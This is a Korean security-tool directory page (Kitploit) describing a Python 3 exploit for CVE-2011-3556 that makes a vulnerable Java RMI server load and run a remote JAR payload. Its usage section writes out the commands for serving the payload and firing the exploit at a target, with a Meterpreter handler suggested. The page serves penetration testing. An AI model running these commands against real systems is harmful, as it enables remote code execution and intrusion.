Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve_2011_3556 — Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC). | Kitploit
도구/GitHubGitHub/sk4la/cve_2011_3556
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsk4la/cve_2011_3556

cve_2011_3556

Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC).

저장소 보기
17년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2011-3556 — 개념 증명(PoC)

면책사항

이 도구는 mihi가 Metasploit Framework용으로 제작한 기존 개념 증명(PoC)의 Python 3 구현입니다.

전제 조건

모듈을 사용하려면 아래 지침을 따르세요:

root@kitploit:~
# Clone this repository locally.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# Optionally set the `x` bit to be able to execute the script directly.
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "It works!"

사용법

명령줄

취약한 Java RMI 서버에 의해 원격으로 로드되려면 페이로드(JAR 바이너리)가 HTTP 리소스로 제공되어야 합니다. 유명한 python3 -m http.server를 사용하여 빠르게 제공할 수 있습니다.

페이로드를 다운로드할 수 있게 되면 exploit.py 스크립트를 실행하여 취약점을 트리거하면 됩니다.

root@kitploit:~
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`

페이로드가 Meterpreter(Metasploit Framework)인 경우 use exploit/multi/handler를 사용하는 것을 잊지 마세요.

라이브러리

이 모듈은 cve_2011_3556 모듈을 현재 네임스페이스로 가져와 라이브러리로 사용할 수도 있습니다:

root@kitploit:~
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()

정말 간단합니다!

크레딧

Metasploit Framework 모듈의 초기 구현에 대해 mihi에게 특별히 감사드립니다.

도구 다운로드